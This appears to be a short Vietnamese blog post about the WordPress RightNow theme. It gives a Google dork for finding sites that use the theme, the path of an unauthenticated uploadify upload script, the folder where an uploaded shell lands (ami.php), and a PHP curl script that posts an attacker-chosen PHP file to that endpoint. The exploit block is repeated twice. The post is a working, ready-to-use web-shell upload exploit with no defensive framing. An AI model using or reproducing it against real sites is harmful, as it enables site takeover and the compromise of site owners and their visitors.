Dork : inurl:wp-content/themes/RightNow/
Vuln Check URL :
wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php
Shell folder :
wp-content/uploads/settingsimages/ami.php
Upcode sau ngang hàng với file shell có thể sử dụng localhost để up
exploit code
<?php
$uploadfile="yourfile.php";
$ch=curl_init("http://target/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Vuln Check URL :
wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php
Shell folder :
wp-content/uploads/settingsimages/ami.php
Upcode sau ngang hàng với file shell có thể sử dụng localhost để up
exploit code
<?php
$uploadfile="yourfile.php";
$ch=curl_init("http://target/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
0 nhận xét:
Post a Comment